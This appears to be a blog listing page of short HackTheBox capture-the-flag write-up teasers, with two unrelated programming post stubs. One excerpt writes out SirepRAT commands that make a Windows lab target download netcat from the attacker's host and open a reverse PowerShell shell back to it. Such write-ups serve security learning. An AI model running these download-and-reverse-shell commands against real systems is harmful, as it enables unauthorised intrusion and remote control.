It is an easy Linux machine .Nmap revels that it is running two ports only one is 22 and other 80. Nmap also revels that it is running Drupal 7 CMS.This was the initial foothold. After that we get MySQL creds leading to creds of a valid ssh user.Using snapd for Linux privilege escalation was interesting .
Checking for special symbol in a String in C Programming
Hibernate is a Java framework that simplifies the development of Java application to interact with the database
Hackthebox templated web challenge quick writeup
Introduction Steps Involved Port Scan python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args “/c powershell Invoke-Webrequest -OutFile C:\nc64.exe -Uri http://10.10.14.20:8000/nc64.exe” –v python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args “/c C:\nc64.exe 10.10.14.20 9001 -e powershell.exe” –v
Introduction It is a openBSD machine which has some directory enumeration and mostly all the steps are based on enumeration.Making the initial foothold may take time but over all a great machine . Steps involved 1-Port Scan 2-Enumerating website 3-Directory enumeration 4-Making of perfect payload 5-Getting reverse shell 6-Getting webapi_user password 7-Getting ssh keys for…
It is a great machine from hackthebox .The OS is Linux it includes little web enumeration which leads to explotitaion of the New management system.Further enumeration gave the creds for the user .then switching amother user with some guess work.And privilege escalation by exploiting usb-creator
Academy is a great linux machine from the hackthebox platform.It is an easy machine which involves tampering of roleid to register as the admin and then get the dev subdomain.Which is followed by exploiting the app.
It was a great machine from hackthebox.It had only two ports open.And after testing the website got an error and got a CVE related to it .Rest was easy .For privilege escalation linpeas was enough.